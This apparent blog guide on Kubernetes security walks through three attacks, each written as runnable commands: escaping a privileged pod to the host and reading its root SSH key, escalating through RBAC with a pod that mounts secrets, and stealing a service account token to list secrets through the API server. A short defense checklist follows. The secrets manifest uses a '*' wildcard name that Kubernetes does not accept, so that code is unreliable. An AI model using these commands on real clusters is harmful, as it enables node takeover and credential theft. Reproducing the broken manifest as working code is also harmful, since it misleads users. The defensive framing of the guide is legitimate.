Kubernetes Security: Pod Escape & Cluster Takeover

Key Takeaways

Pod escape can lead to node compromise and lateral movement.
RBAC misconfigurations are the #1 cause of K8s breaches.
Secrets in etcd are base64 encoded, not encrypted by default.
Service accounts with cluster-admin can compromise everything.

Kubernetes powers 80%+ of containerized workloads. A single misconfigured RBAC rule or privileged pod can give attackers complete cluster control. This guide covers every attack path.

Attack Surface Overview

API Server: Misconfigured authentication/authorization
etcd: Unencrypted secrets storage
Kubelet: Anonymous access, read-only port
Pods: Privileged containers, hostPath mounts
Network: No network policies = flat network

Attack #1: Pod Escape via Privileged Container

# Check if running privileged
cat /proc/1/status | grep Cap
# CapEff: 0000003fffffffff = ALL capabilities = privileged!

# Mount host filesystem
mkdir /mnt/host
mount /dev/sda1 /mnt/host

# Access host SSH keys
cat /mnt/host/root/.ssh/id_rsa

# Escape to host
chroot /mnt/host /bin/bash

Attack #2: RBAC Privilege Escalation

# List your permissions
kubectl auth can-i --list

# Dangerous permissions:
# - create pods (can mount secrets)
# - create/patch roles (can escalate)
# - list secrets (credential theft)

# If you can create pods, mount all secrets:
apiVersion: v1
kind: Pod
spec:
  containers:
  - name: pwn
    image: alpine
    volumeMounts:
    - name: all-secrets
      mountPath: /secrets
  volumes:
  - name: all-secrets
    projected:
      sources:
      - secret:
          name: "*"  # All secrets!

Attack #3: Service Account Token Theft

# Every pod has a service account token
cat /var/run/secrets/kubernetes.io/serviceaccount/token

# Use it to access API
APISERVER=https://kubernetes.default.svc
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)

curl -k -H "Authorization: Bearer $TOKEN" \
  $APISERVER/api/v1/namespaces/default/secrets

             Defense Checklist
            Disable automountServiceAccountToken when not needed
Use Pod Security Standards (restricted)
Enable RBAC with least privilege
Encrypt secrets at rest in etcd
Implement Network Policies
Enable audit logging

        

Frequently Asked Questions

How do I scan for K8s vulnerabilities?

Use kube-hunter (penetration testing), kube-bench (CIS benchmarks), trivy (container scanning), and kubeaudit (RBAC analysis).

Secure your cloud infrastructure.
Docker Security Guide